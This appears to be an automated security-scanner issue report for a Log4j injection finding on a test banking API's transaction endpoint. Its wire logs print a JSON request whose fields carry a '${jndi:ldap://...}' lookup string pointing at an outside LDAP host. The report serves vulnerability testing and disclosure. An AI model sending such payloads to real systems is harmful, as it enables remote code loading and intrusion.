log4j_injection on POST:/api/v1/primary-transaction

[FidaUrRahman]

Title: log4j_injection Vulnerability on POST:/api/v1/primary-transaction Project: Bismillah Description:

Assertion Log4j Injection is an attack in which the attacker is able to invoke a remote server by injecting JNDI lookup string to perform a remote LDAP lookup via vulnerable application.Risk: log4j_injection Severity: Critical API Endpoint: http://netbanking.apisec.ai:8080/api/v1/primary-transaction Environment: Master_github Playbook: ApiV1PrimaryTransactionPostBodyParamLog4jInjection Researcher: [apisec Bot]

QUICK TIPS

Suggestion: Effort Estimate: null Hrs Wire Logs: 07:21:22 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction] 07:21:22 [D] [AVPTPBPLInjection] : Method [POST] 07:21:22 [D] [AVPTPBPLInjection] : Authorization [Default] 07:21:22 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 07:21:22 [D] [AVPTPBPLInjection] : Request [{ "amount" : 7377, "availableBalance" : 1426867509, "createdBy" : "", "createdDate" : "", "description" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "type" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "version" : "" }, "version" : "" }] 07:21:22 [D] [AVPTPBPLInjection] : Status code [200] 07:21:22 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Y2M2MGM0YTctYjM4Ni00NDExLTg3OGItMzVlZGFjMDVhMzEw; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 26 May 2022 07:21:21 GMT"]] 07:21:22 [D] [AVPTPBPLInjection] : Response [{ "requestId" : "None", "requestTime" : "2022-05-26T07:21:22.257+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 07:21:22 [D] [AVPTPBPLInjection] : Response time [790] 07:21:22 [D] [AVPTPBPLInjection] : Response size [306] 07:21:22 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"0a34a242-4f54-46a0-a957-3c4d443dc577","ip":"10.240.0.20","timestamp":"2022-05-26T07:21:22.198375Z"} == null] result [Failed]

IMPORTANT LINKS

Vulnerability Details: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/dashboard/8a70803680faf14f0180ff3dd0124912/details

Project: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/allScans

Environment: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/environments/8a70803680faf14f0180ff39a86e480c/edit

Scan Dashboard: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/profiles/8a70803680faf14f0180ff39a883480e/runs/8a70803680faf14f0180ff3c15334811

Playbook: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/playbooks/ApiV1PrimaryTransactionPostBodyParamLog4jInjection

Coverage: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/categories

Code Sample: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/dashboard/8a70803680faf14f0180ff3dd0124912/codesamples

PS: Please contact support@apisec.ai for apisec access and login issues.

--- apisec Bot ---